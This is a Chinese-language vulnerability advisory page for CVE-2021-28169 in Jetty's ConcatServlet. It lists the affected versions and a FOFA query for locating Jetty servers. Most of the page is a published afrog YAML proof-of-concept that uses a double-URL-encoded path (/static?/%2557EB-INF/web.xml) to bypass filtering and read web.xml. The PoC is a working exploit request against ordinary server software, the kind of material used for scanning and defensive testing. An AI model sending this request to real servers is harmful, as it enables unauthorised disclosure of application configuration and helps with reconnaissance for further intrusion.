CVE-2021-28169: Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞

日期: 2025-09-01 | 影响软件: Jetty通用Servlets组件 | POC: 已公开

漏洞描述

影响版本:<= 9.4.40、10.0.2、11.0.2 正常情况无法通过/static?/WEB-INF/web.xml访问到敏感文件web.xml,将W进行双重URL编码可以绕过拦截,访问敏感文件 web.xml FOFA: app="jetty"

PoC代码[已公开]

id: CVE-2021-28169

info:
  name: Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞
  author: zan8in
  severity: high
  description: |-
    影响版本:<= 9.4.40、10.0.2、11.0.2
    正常情况无法通过/static?/WEB-INF/web.xml访问到敏感文件web.xml,将W进行双重URL编码可以绕过拦截,访问敏感文件 web.xml
    FOFA: app="jetty"
  reference:
    - https://mp.weixin.qq.com/s/OLWFRzQS6iqCMuE_MhRIQQ
  tags: jetty,cve,cve2021,disclosure
  created: 2023/09/06

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /static?/%2557EB-INF/web.xml HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
    expression: response.status == 200 && response.body.bcontains(b'<web-app') && response.body.bcontains(b'</web-app>') 
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-28169.yaml

相关漏洞推荐